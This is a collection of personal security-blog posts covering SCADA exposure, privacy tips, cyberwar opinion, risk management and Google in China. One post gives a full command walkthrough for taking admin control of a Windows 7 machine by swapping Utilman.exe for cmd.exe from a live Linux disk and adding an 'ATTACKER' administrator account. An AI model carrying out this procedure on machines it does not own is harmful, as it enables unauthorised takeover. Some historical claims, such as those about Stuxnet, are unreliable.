After a series of threats from the cyber-criminals stating they were going to blow up theaters and the white-house, President Obama stepped up for Sony and gave a speech about the consequences for "not stepping up" on this threat. President Obama also said he was going to take a "proportional response". Days after his speech, SONY complied and they aired the movie. The funny thing is that mysteriously, on late December (December 22, 2014) , North Korea suffered a severe Internet outage which lasted nearly 10 hours and a 24 hour sustained instability on their networks. Not only that, North Korea had a blackout (yes, a power outage) after the Internet outage and yesterday (January 26, 2015), North Korea's power lines are starting to have problems again.

Picture from: Dyn Research

Whether this is a government to government attack or not, let's take a little look at SCADA systems. SCADA (Supervisory Control and Data Acquisition) are systems which operates through an operational channel through a series of commands to a centralized control panel. These systems include (but are not limited to) water purifiers, oil refineries, nuclear plants, laboratory gadgets, traffic lights, PLC (Programmable Logic Circuits) peripherals and devices, backbone infrastructure of continents. The very bad idea of this is that all of these critical infrastructure components can be accessed and managed from the Internet. Even though SCADA systems have been around for longer than the Israeli and CIA's creation of the worm Stuxnet (2004), it got really popular after Stuxnet's attack on Iran's nuclear plant.

Nowadays, people can benefit from SCADA beautifulness (and abused by cyber-criminals) by using a very popular search engine called SHODAN (www.shodanhq.com which retrieves, scans, indexes and displays the login banner of the hosts through results via services (TELNET, FTP, SMB, HTTP, HTTPS, etc) for any device connected to the Internet. This not only includes SCADA infrastructure devices, but also a plethora of other devices; such as baby monitors, CCTVs, digital refrigerators and toasters, backbone routers, gas stations and anything that contains a silicon-based micro-chip connected to the Internet.

Despite the protocol, a user is able to see the banner information which might prompt credential information, which increases the odds of a curious or malicious user by at least 50% of brute-forcing and get into the system. This is a serious risk. So serious, one member of the U.S. Homeland Security described SHODAN as a national threat.

Whether it is a threat or not, I strongly believe the people who has to take the blame are the ones who "secure" these so critical systems so poorly and making them accessible in the Internet for all praying eyes. By making it easy for attackers by using default passwords, for example, anyone researching that manufacturer's or simply by looking at the user guide, can have instantly access and actually has the control of an entire city or continent. Also, there are weak passwords implemented to these systems which is based on lazy and ignorant system administrators. A very good example on this is the product manufacturer's flaw on SIEMENS products.

SIEMENS provide an autonomic way of managing electrical, medical, energy, financial, consumer, etc. Some of their products are very critical to global infrastructure, so they play a big role to SCADA systems. In 2011, during the BlackHat - Las Vegas event, a security researcher showed the highly critical flaw in SIEMENS control systems. The flaw: hard-coded administrator password in the firmware. Login information could be obtained by reverse engineering the code of their software which could be available anywhere on the net. It is highly hard to believe that a company with such reputation and responsibility makes a mistake of this high degree. Not only the attacker could exploit this vulnerability, but also could lock down the administrator having total access to the system and prevent anyone from interfering with his evil plans and actions.

Siemens PLC hidden Easter egg in the firmware from Germany hackers. (Courtesy NSS Labs)

Above, it is a message left by some German "hackers" just to prove that their system could be exploited.

So, where is all this heading to? Are SCADA systems really that insecure? How can they avoid getting their products compromised? Are they liable if a city "goes down"? Is a hack able to actually kill city's residents by infecting the water or make a thermonuclear plant?

This is where the new movie, Blackhat (http://www.imdb.com/title/tt2717822) comes into place. We all know Hollywood for being very involved with everyone's lives because the most of us love movies. Also, we all know the impact Hollywood has in our lives. For one thing we know, that Hollywood has "predicted" so many events with hidden messages, symbolisms and even movie scripts. It might seem like they have the "magical crystal ball" in their hands. Even though Hollywood recreates an imminent dystopia for all of us to see and wonder about our future, their movies are a little far from reality. Though, the concept we have to really look at. They are always right about the main point and theme of their movies. Disseminating the facts from fiction and you will notice that one of Hollywood's new movies: Blackhat is not very far from the truth. This movie is about a hacker being hired by the U.S. government to defeat a black hat hacker (cracker or bad hacker) from causing a lot of chaos by affecting SCADA critical infrastructure points of North Korea and the WHOLE WORLD!

Apart of Stuxnet, nothing like this has ever been done, which proves that it can be possible and it is an option. Also there exist SCADA Trojans who are right now being improved to affect SCADA's systems. But whatever we have looked at might have been limited to the audience eyes. Whatever we see and hear is already being filtered. There is, in fact, a cyber war going on right now and I would like to share this link with you. http://map.ipviking.com/

It shows (in real time) which country is attacking who, their IP addresses (real or spoofed), destination, number of hits taken, etc. It is not a simulation, nor a game. It is taken from the Norse Live Attack Intelligence database.

With this graph in mind, North Korea's situation, knowing about SCADA and the movie Blackhat, I should ask these questions: Are we all heading to an imminent disaster? Will it be a dystopian future as shown as in Hollywood movies? What about war involving citizens? Will wars be fought with guns, drones and tanks or by attacking critical SCADA infrastructures? Will only governments do this or hacktivists will step up too to show their point of view? I guess, the future is very near and the only way of knowing is giving it time. Only time will tell...

Please, feel free to post your responses in the comments section below.

Sources:

http://deadline.com/2014/12/sony-hack-timeline-any-pascal-the-interview-north-korea-1201325501

http://www.cnbc.com/id/102289459

http://www.theguardian.com/world/2014/dec/22/north-korea-suffers-internet-blackout

https://www.northkoreatech.org/2015/01/27/more-internet-problems-hit-north-korea/

http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/54/stuxnet-malware-targets-scada-systems

http://www.wired.com/2011/08/siemens-hardcoded-password/

http://www.imdb.com/title/tt2717822/

http://map.ipviking.com/

How to Better Your Privacy

noreply@blogger.com (UnsecurityNow) — Wed, 16 Jul 2014 22:22:00 +0000

Reaching Out

Nowadays we live security in a different way we used to several decades ago. With all the new laws, regulations and government surveilance it is really hard for a regular user to keep privacy on the net. Lately I have been a little absent from writing anything about security because I wanted to know where it was heading. Tight with job and homework deadlines I had little time for myself to really work something out about security. In a matter of fact, lately I haven't got much time to do anything related to IT besides studying and working in the field.

Having a new job working for a PaaS (platform as a service) outsourcing company as a Unix System Administrator, I have kept myself motivated with IT and burned the rest of my time finishing up my degree with highest honors. After finishing my degree, I decided to begin my Bachelor's degree in Cyber-Security. Now I can see myself with a little more time to keep up to date learning new security methods, techniques and products. After hearing about the whole Edward Snowden case, I was urged to write something about our daily-diminished freedoms but first I wanted to touch base with basic guidelines to keep yourself secure from the web. Since this blog covers a wide variety of audieces (beginner, medium and advanced), I thought it would be a great idea to start with simple steps to maintain your anonymity and here it is. Enjoy and keep learning my friends.

Nothing is What It Seems

Like any of you might know privacy cannot be obtained if we sacrifice it to gain security. Both must go linked and never lose their characteristics or quality, otherwise we lose both (Benjamin Franklin). Also, security is a two-faced concept: feeling secure and being secure. You can be safe and feel safe as well as not being safe and feeling it, but this concept really makes sense and opens up to arguments when there is a courtain which prevents us from seeing what is really going on. For example, we can be secure and not feeling it or feeling secured even we are not. Even the latter is the most common one, both ways are not what they really seem, thus the name of "security by obscurity". This psychology trick is practiced by many lawyers, law enforcement, the media and many governments, entities, organizations and organizations. Even though they might be playing with this concept to achieve their goals, our achievement, the 99% of population's goal is to achieve the feeling of being secure AND the reality of being secure.

How to Determine Real Security

By experential knowledge (learning from experience) we can avoid getting scammed again and identify a safe or unsafe environment a little better. The problem arises when there is no transparency in the security controls or the lifestyle that we live today with biased and mis-informative media, excess of gadgets, unprotected access points, mobile Internet and on-line banking. The best way to be a little more secure and feeling secure is to mitigate the risks of being watched and this is done by limiting (if not eliminating) our bad and lazy habits. Everywhere we go, we leave not only physical tracks but digital ones. Every-time we turn on our car engine, play our favorite satellite radio, browse Facebook, Twitter or LinkedIn, commute, text and call using our phones, browse the Internet, shop on-line and physically using a POS (point-of-service) device by swiping our credit or debit card we are leaving a lot of physical and digital tracks - and this is only half a day-. Jot down your daily activity and what technology models you use. After having a list of all the technology models (car, phone, credit-card, computer, etc) determine if it is better off to mitigate if not eliminate one of all of these models. One example is to take out cash once a week instead of paying with your debit card every time you want to eat out or put gas on your car. This is real security. To avoid risks by mitigating them you achieve real security. Next, there are some examples and ways to mitigate risks of digital and psyical trails. First (on the further left) there will be the technology model, next the risk, next the solution and ultimately (further right) the accomplishment using the solution given. Let's examine:

Using car -> People know where you are -> Use public transportation -> Spend less money. More security.

Using satellite radio -> interest tracking -> Use iPod -> More privacy. Still listen what you want.

Pay with credit/debit card -> digital trail -> use cash -> more privacy, avoid

tracking.

Use phone -> calls eavesdropping, less privacy -> Use Red Phone -> encrypted calls.

Use texting-> metadata and message content collecting-> Use TextSecure to encrypt texts.

Chat with friends -> messages being eavesdropped -> Use ChatSecure -> Provides end to end encryption, more privacy

Surf the Intenet -> Data Mining, less privacy -> Use TOR (anonymizing software) -> More secure.

Surf in public shop -> eavesdropping communication -> Use VPN -> Encrypted tunnel for your communication.

Note: For red phone, chat secure and textsecure to work as with end to end encryption, both parties (sender and receiver) must have the same application installed on their smart-phones.

Conclusion

The point here is to not avoid have 100% privacy and security because that is impossible in this digital and physical world. What we must aim is to have the most privacy as possible while keeping ourselves out from the stack of potatoes that governments and entities like Google and Facebook use to watch our every-day habits and use them for their own good. Being aware is the first step, now you have to step up and make it a habit.

How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 7 Computer

noreply@blogger.com (Anonymous) — Wed, 09 Oct 2013 05:39:00 +0000

Disclaimer: First of all I would like to let you know that I don't held responsible for the misuse of the information stated here. This blog is only to let people know about the vulnerabilities, bugs, and security vectors that are out there since the companies that posses them do not even talk about it, so I bring it to the light to make people more aware of this issue. Since the first 10 amendments (the bill of rights) gives me the right to share information, here it is because knowledge is power.

Nowadays, someone does not need to know a lot about security's inner-workings of the Windows 7 Operating System to take total control of it. This simple procedure is so simple even a 10 year old can do it with the need of ONLY a Linux live CD or DVD (even a flash drive) to boot with BIOS. This procedure I like to call it application hijacking and there is no fix or way to defend this in the Windows Operating System side. However it can be diminished by putting a password on the BIOS but even that way it can be bypassed by taking the CMOS battery out resetting the BIOS password completely. This way will be too notorious if the owner of the computer checks the BIOS and realizes there is no prompt for password but it might be too late...

So here it is. First, we can see the Window Log in is totally normal. This attack relies on the "Ease of Access" button which helps people with dissabilities use the Operating System providing them with magnifying glass, on-screen keyboard, voice recognition, etc. As the name states "Easy of Access" now it becomes "Ease of Penetration Access" :)

With this said, we will try booting on BIOS but first we need to configure so it boots with CD-ROM, DVD-ROM or Flash-Drive (however your preference is).

After this, we boot with Linux. For this lab, we will use one of my favourites distros: Kali Linux (aka Backtrack 6).

We wait until all files, hardware, kernel and services are loaded and we will get prompted with the desktop. You can try it with CLI or GUI. It really does not matter as long as you use this proper commands:

First we create a directory where we will mount the physical hard-drive (where Windows 7 resides on). Note /dev/sda# will be your hard-drive if you are using SATA drive and /dev/hda# if you are using IDE hard-drive.

#mkdir /media/harddrive
#mount /dev/sda1 /media/harddrive/

Now we will proceed to the hihjacking process but first we will make a backup to the "ease of access" file which is called "utilman.exe".

#cd /media/harddrive/
#cd Windows\
#cd System32\
# mv Utilman.exe Utilman.Backup.exe

Now let's do the hijacking process with cmd.exe :)

#cp cmd.exe Utilman.exe

Reboot the system:

#reboot

Now it is time to reboot the system, take out the CD, DVD or Flash-Drive, Change BIOS back to normal and let Windows start

After Windows start, let's click one more time to the "Ease of (Penetration) Access" button and "Viola!!", the CMD.exe window with ADMINISTRATOR privileges appears :)

Now, let's give ourselves Administrator Access with the username "Attacker":

NET USER ATTACKER /ADD
NET LOCALGROUP ADMINISTRATORS ATTACKER /ADD

Let's verify the user attacker is an administrator:

NET USER ATTACKER

You can also verify by seeing who is in our Administrator's group:

NET LOCALGROUP ADMINISTRATORS
EXIT

Now it is time to login with our newly-super-user account:

Let's verify that the account we just logged in has administrator rights:

The lesson of this lab is not to teach anybody to break rules but to make users aware of the dangers big profit-glutton corporations like Microsoft. You can help securing your computer form this attack by 1) Disabling CD-ROM/DVD-ROM and USB External Storage. 2) Putting a BIOS password and 3) Removing CD-ROM, DVD-ROMs or buying a computer with not USB connections :-D

Big cheers to RS who made me aware of this security vector.

I hope you enjoyed it!

Shanghai Hackers and The “Obscured” Cyber-War?

noreply@blogger.com (UnsecurityNow) — Wed, 27 Feb 2013 17:05:00 +0000

Technology deals with a huge part in our lives. Everyday we are consciously and unconsciously concerned about it mostly because we were grown into it and are very used to it because we all count with it everyday. Most consumers think technology is our friend, but what does the government think and use technology? You will be amazed in how different are the two perspectives. When regular consumers are anxiously waiting for the next “cool gadget” with built-in biometric technology to come out, the US government is fighting against huge power-outages, Denial of Service attacks, network traffic sniffing, unauthorized backdoor access and other hacking techniques coming mainly from China. This interesting contrast reflects how technology can be used for good and also bad.

Government DOSed, defaced websites taken down, oil rigs computers infected by malware, huge bot-nets managed by zombie university computers attacking government systems, spying wall-street journal newspaper and leaking national top-secret documents to the whole world, using SQL injection to share a whole governmental database (user credentials) to the web; even Google to obtain social-security numbers from Americans are all examples of a current “catastrophic cyber-war”; also known as the new “virtual pearl harbor”. (http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&accountid=27655). The news are making all of us afraid of a cyber war but who are attacking who? Who are the suspected victims? Who are the targets? What are the allegations? And the most important: Where are they located? All these questions are making people afraid, hiding the truth. The truth is plain and simple. We should not have more fear than to governments attacking governments all around the globe.

The US government is recruiting going from 800 to 5,000 security specialists and gray-hat hackers to help governments steal data, disrupting operations, and playing a cat-mouse game which never ends. “[Government fighting government with virtual weapons] is the most dangerous and concerning technological threat in our lives” -Bruce Schneier. We are all aware about the fact that China is attacking the US government. According with Syndigate.info, 16 percent of observed cyber attacks came from China in the second quarter of the year” 2013 (http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&accountid=27655). While the government is tracking China (their suspected attacker) for as long as China started to see the U.S. as the arch-enemy due to the fact Bush started the war on the middle east. As far as proves, there are many. Several US government entities (NSA, Pentagon ,White House, etc), newspapers (Wall-street Journal), credit-card companies (Master-card, VISA); even really popular sites such as Google and Facebook (http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html).

While the U.S. is being attacked from China, the US is monitoring its more successful invention: Stuxnet. Stuxnet is a military worm which has been invented by US Government and Israelis to spy on “terrorists”. Stuxnet has been invented in 2006 to make the US aware of other government's plans, and spy on whoever they would like. It is being a success because it is really difficult to detect and is infecting thousand of worldwide computers acting stealthy and sneaky in order to have the less noticeable behavior possible. Other than Stuxnet which has been public, who knows what other “stuxnets” are out there that are being also unnoticeable from other governments...

According to Bruce Schneier on a Keynote at Internetdagarna 2011, the two things that are really difficult of knowing in regards of a cyber attack, are “who is attacking and why, and that is what makes cyber-defense so difficult”. Also he said that with today's technology, anybody (even a kid) can do serious damage to a computer connected to the internet, including government websites using SQL injection techniques, launching DOS attacks and even guessing (brute-force) a default password set on a router sitting elsewhere configured by a negligent system administrator. Even though the risk is out there and according to the attack vectors, new rules, protocols and procedures are being put in place by governments (Government urged to set cyber standards: http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&accountid=27655). Even though some regulations might seem OK to diminish (not prevent) cyber terrorism, little by little our freedoms are at stake. For that reason a good, solid standard procedure should be put in place which makes us feel safer and actually make us safer. Security is a trade-off. One has to risk something to get security back, but what you can never, and I mean NEVER trade for security is freedom. Just like Benjamin Franklin once said “One that trades security for freedom, does not deserve security nor freedom”. So what approach do we choose to be more secure not only from cyber-vandalists and script-kiddies but also from the governments?

According to Antone Gonsalves February 22nd, 2013 (http://readwrite.com/2013/02/22/no-cyberwar-with-china), cyber-war is not here yet because “Real cyberwar would start with an attack that destroys something valuable or vital, kills people, or both.” Does it really make killing people and vital resources a real cyber-war? I think it is a matter of perspective and with time we will realize that cyber-war will be more human-like wars.

I believe a way to prevent cyber terrorism is to stop being afraid of news and what the media and governments say. The main goal for a terrorist is to “make terror”. According to Webster-Merriam dictionary, terrorism is “the systematic use of terror especially as a means of coercion”(http://www.merriam-webster.com/dictionary/terrorism). I highly think reinforcing general policies in general such as: military control instead of focusing on every power-grid in the US skyrocketing their expenses for useless outcomes. Also, another example to protect society from cyber attack and also physical attack is to reinforce rules and regulations on schools instead of putting additional guards in every school in the country to prevent sad kids from shooting everybody during his/her class. The point is that it is mostly psychological. It is true everyday more and more websites, databases, organizations, governments and financial institutions are being breached and being posted at pastebin and their own sites for everyone to see (for example Anonymous and Wikileaks).

What is important is to realize that is more psychological than fact and to put into perspective general solutions and counter-measure the threats instead of being too specific and “micro-manage” things because we will fail most of the times. It is also important to note that security relies on two factors: feeling secure (psychological) and being secure (facts). It is totally useless to rely on the most expensive and best-configured firewalls if you don't train your employees from not divulging important
information and keep them happy so no one goes “to the other side of the road” and buy you out just like Bradley Manning. The most important is to be educated and to live a little bit more carefree.

Sources:

Hackers take down U.S. government website by Xinhua News Agency - CEIS [Woodside] 26 Jan 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1284133751/abstract?source=fedsrch&accountid=27655
Chinese cyber attacks on Western firms, governments 'growing': Experts by Asian News International [New Delhi] 02 Feb 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1283496982/citation?source=fedsrch&accountid=27655
Government urged to set cyber standards Press, Jordan. The Gazette [Montreal, Que] 22 Feb 2013
http://search.proquest.com.proxy.itt-tech.edu/docview/1298835132/abstract?source=fedsrch&accountid=27655

How researcher Hacked Facebook Oauth To Get Full Permission On Any Facebook Account
Reported by Sabari Selvan on Friday, February 22, 2013 |
http://www.ehackingnews.com/2013/02/how-researcher-hacked-facebook-oauth-to.html
U.S. presents plan against industrial cyber-espionage: US GOVERNMENT by EFE News Service [Madrid] 20 Feb 2013.
http://search.proquest.com.proxy.itt-tech.edu/docview/1289100384/abstract?source=fedsrch&accountid=27655

Why We're Not In A Cyberwar With China by Antone Gonsalves February 22nd, 2013
http://readwrite.com/2013/02/22/no-cyberwar-with-china

Bruce Schneier - Keynote at Internetdagarna 2011 http://www.youtube.com/watch?v=dhzk9ZDhObw

Webster Dictionary: Terrorism Definition

Risk Management

noreply@blogger.com (Anonymous) — Thu, 08 Apr 2010 16:52:00 +0000

The principles of maintaining a system secured are old as information itself. As long information has been around, ways for preventing information from reaching unwanted hands have been highly reinforced. Due to technology increase, it makes systems more vulnerable to different methods, also known as vectors. Once a system administrator tries to find out what went wrong with the system, sometimes it is too late. For this case, one must be aware of the latest technology involved in your field. Ways of maintaining system secure are changing everyday but principles will never change. Some principles are straightforward to understand and to perform because they do not include too much technical background.

One of the most important concepts of data security is to have availability. How can something be secured if it has been deleted due to a weather incident, human negligence or a malicious act? The first step is to back data regularly. Data backup is perhaps the most antique way for preserving data. There are different categories of backups: full, differential, incremental and delta backup. They differ in the amount of data and when is preserved. The second step to prevent data disasters is to have the proper equipment. Having a UPS (Uninterruptible power supply), having proper job practices, such as not bringing food to the workstations, and policies help an organization to prevent data disaster.

The disaster recovery process has many methods in which helps an organization preserve their data and not endangering it negligently. Other than making proper backups, using proper equipment and procedures, there are also other ways that blend into the same process. Anticipating risks, planning a strategy, and a post-disaster plan helps the organization to act accordingly to such an act. There are two kinds of risk managements. Quantitative and qualitative. Quantitative risk management determines the impact of threats by providing clients with advice, knowledge, and tools necessary to adopt innovations. Qualitative management risk is the separation or categorization of risks. They are categorized in three ways: low, medium and high following a scale from one (being the less severe) to ten (most severe). Some of this scales rely on models. Threats can be divided in categories as well. They can be natural, physical, network human and eavesdropping threats. One must understand the equal importance to those threats. There are no less or more important threats, they are all the same because they all face critical destruction of data. Even though a company might disagree to this concept I understand why. A company with a limited budget cannot spend time fixing every whole that might be possible in a system. They can only fix those holes they see the most eminent.

Lastly, the people aware of the security holes varyies from company to company, but I personally think it must be done accordingly and very cautiously. Critical information in the wrong hands can lead to more hands on that vulnerability and might lead to total disaster. Only certain personnel must be told about the security vulnerabilities and/or breaches and give them a solution. If no one is able or capable to determine what went wrong, they will less likely know what to do to fix them. Some white-hat hacker organizations try to break into corporation systems and offer them help to fix them. In a movie I watched yesterday called “En Busca de Los Hackers” (Seeking for Hackers) – Spanish version, a group of Spanish white hat hackers said that offering themselves to help companies with no hard evidence that somebody has broken into their system does not work. Every company have turned them down. The only method, for them, is the illegal approach. They break into the system first, put the flaws in a disc explaining how they found it and present it to companies for hire. 1 out of 9 companies hired them. No wonder there are vulnerable systems all around the world. If people, including corporates have that fear about hackers, what can they do to make their systems better. Of course, there are bad people out there, but not everybody who call themselves hackers are really what they are.

In this cyber world full of vulnerabilities it is hard to know who is in which side of the road. The only solution for a company is to back up their data daily, that way if they ever lose something they only lose the revenue of a day worth of work, thus controlling how much money they might lose. It is not a matter of if, it is a matter of when. Every system in this world has been compromised at least once in this history, that means no system is silver-bullet for an organization. There are security bases and procedures of course, and they try to minimize the risks as less as possible to save company time and critical data. Only remember one thing, anybody with proper knowledge, a computer connected to the Internet and time, can break into ANY system. One of the reasons is because companies do not encrypt data that goes through the networked medium. Companies seek flexibility, and convenience and these have a price. The price might be more than what they were looking to achieve, and the price is their privacy lost.

Sources:

http://www.it-observer.com/best-practices-securing-your-enterprise.html

http://en.wikipedia.org/wiki/Risk_management

“En Busca de los Hackers” – Seeking for Hackers ( Spanish Movie)

The Fragile Web

noreply@blogger.com (Anonymous) — Thu, 01 Apr 2010 18:49:00 +0000

Stay secure over the Internet is almost virtually impossible. Even though total security is completely impossible, there are ways to minimize the risks. Prevention is half of the equation, the other half must be secure practices. As more exposure we get as computer users, the more security driven most of us become. If you are not worried about privacy because you use Linux or MAC, you still must be. Non-encrypted communication, social engineering and online scams don’t discriminate Operating Systems thus making you even as vulnerable than Windows users.

It is harder to stay secure in the 21st century digital era because there are more flexibility options, and more temptations over the Internet. Having a non-encrypted connection might expose your data to the wrong eyes risking your privacy even though you might think you are safe enough by having an up-to-date Antivirus installed on your computer and scan it everyday. Also, having IDS on your home computer might not help a lot as well as a corporate firewall. I think leveling the risks with cost is the best way to implement security. Why wasting a lot of money for professional use if the threats are not potentially important in a home environment than in a corporate which contains top secret information?

By leveling risks with cost determines if you really should spend money and time on implementing such system. Having a personal firewall might only help if the user is security conscious and is willing to spend time and effort on checking every process and communication that is going through your computer every time a pop up window appears. It is worthless to have top of the notch technology if the user is not going to spend time on checking, and in this case, a user has to spend time and effort setting up firewall rules in order to minimize risks and false positives on a system.

Also, it is worth to mention that not only a personal firewall and an up-to date anti-virus and anti-spyware are needed. It is also recommended for those who do transactions on-line and send important e-mails to use an encrypted connection. The uses of VPNs are widely known for companies, but what about home users? Is it not the same, if not similar risk in a corporate and a home user who is managing his online banking? It only takes someone to make a targeted attack on you to have your identity stolen. The best way to prevent this is “abstinence”. Try to not do financial stuff online. That way, corporations will likely change their online policies and try to improve the system so more people could use it. It all comes down to money. This method will negociate with corporations thus making them change their strategy. For example, Verizon (Slashdot website) will charge an extra $25 to make online payments more secure. I agree with their strategy over the phone using a one-time password for purchase confirmation, but I don’t agree by paying more to get a security improvement they should done in the first place. Security must be provided with service at same rate.

Even though paying with phone password confirmation might seem a more secure way to do online payments, there are risks in phones as well. The only risk I can think of about phones is that users can put personal information about contacts. If the phone is lost or stolen, important sensible information can be gathered. For example, blackberries can not only be traced with a built-in GPS system but also the Facebook application does not time out after an X minutes or even days of inactivity. That means, the user might have facebook application logged in for weeks or even months and if the phone is lost/stolen, and a bunch of other (internal) information can be taken from and about your contacts. When technology increases and goes mobile, that is when the consumer must be more aware of risks because now information is not only wired, communicated into encrypted and non-encrypted information. Now information is also being transmitted over the air (highly non-encrypted) and it can be eavesdropped by any person. That is when Man-in-the-middle attacks come into place.

Not only on phones, but also other communication medium over the air is vulnerable and susceptible for an attack. Even though many people might think Man-in-the-Middle attacks might take a tremendously amount of effort, there is still an easy way to pull it off. That way is by ARP poisoning using an open source tool called Cain & Abel. (irongeek website). With this method, it is very easy for a knowledge (hacker?) person to get his stuff dirty on your personal information in places known as cyber-cafes, airports, Mc Donald’s and some convenience stores.

Having the best flexibility possible, the most secure possible is impossible. You can not have both. While some people prefer convenience and flexibility over security, a wiser choice might be to try to achieve both at a certain level to minimize the risks of being hacked. In this high-tech world, doing our everyday chores while going mobile might seem dangerous. This is the time to think wisely about our decisions. Come on! We can do better America!!

Sources
Verizon Strategy: http://games.slashdot.org/story/10/03/22/2141205/Verizon-Set-To-Launch-Mobile-Payment-Service?art_pos=1

Cain & Abel: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Struggle VS Google and China

noreply@blogger.com (Anonymous) — Wed, 31 Mar 2010 19:54:00 +0000

Culture is what divides each nation. Culture can make technology change the way is wanted. Without culture, a society can be lost in richness and binds into another. The culture is what we have inside and cannot describe it because it is part of our personality and rules we obey in our daily lives. When culture is violated, we feel like we are being harassed and taken our dignity away. When business agreements influences culture and principles of a nation, that is where the problem arises.

Google is very known as the power giant of online searches. Anybody can access their own country version of Google by their own machines. For example, if you are in Ukraine, the site Google.com will be redirected to Ukrainian version of Google. Google had an agreement with China. The agreement was that Google would provide fast searches inside the Big Firewall of China but have censorship on it so the Chinese nation wouldn’t be able to start a political revolution aided by the Internet. We all know China is a communist country and communist governments limit the availability of information they consider “not suitable” for their nation to have access to.

When Google took away censorship, China government’s and some Chinese people felt their culture and life were violated. I am unknown to the fact Google took away censorship but I know that was not a smart move. I truly believe that if you really want business from a foreign country, you have to know their laws and not try to break them. For example, in a party a DJ has to play the music people want to hear, not what they want to hear. Even though the DJ might not like the music, he stills have to play it. He will get paid for it, but if he disobeys and does whatever he wants, the clientele will be severely pissed at him. That is what happened with Chinese government, and communists. Many activists hacked into Google’s headquarter e-mail accounts and systems to reveal themselves for such a bad act. Google kept on reacting badly to the response of Chinese nation, so havoc fell from the sky. Chinese government say Google violated their agreement but so Google did something they thought it would solve the problems, even though it did not.

Google moved (redirected) Chinese version of Google to the version of Hong-Kong and that is a problem, the same problem they had before. Chinese users will try to visit Google and yet have an uncensored version of Google from Hong Kong. The Big Firewall of China is broken. It is broken for two reasons. Users can access any sites they want by going around the Big Firewall in two ways: Google.hk and proxy servers. Maybe Google might help China by removing the redirection, but I don’t think they will because they want money. About proxy servers, there might be underground sites made by Chinese underground mafia which could provide users with proxy servers which make them connect to any site they want.

Any way they choose, the Big Firewall will always be broken thus providing unsolicited information leak through it. Nothing is perfect, and much less technology. We all know that, the Internet is one of the most vulnerable systems in the world because it is very complex and it will take an unlimited amount of time to patch every hole in it. We have special gateways, proxy servers, VPNs, Tor software, anonymizer sites and protocols that can be used to bypass any sort of security that might get in our way.

Sources

http://www.upi.com/Daily-Briefing/2010/03/23/Google-vs-China/UPI-93351269347903/
http://techcrunch.com/2010/01/12/google-china-attacks/
http://www.torproject.org/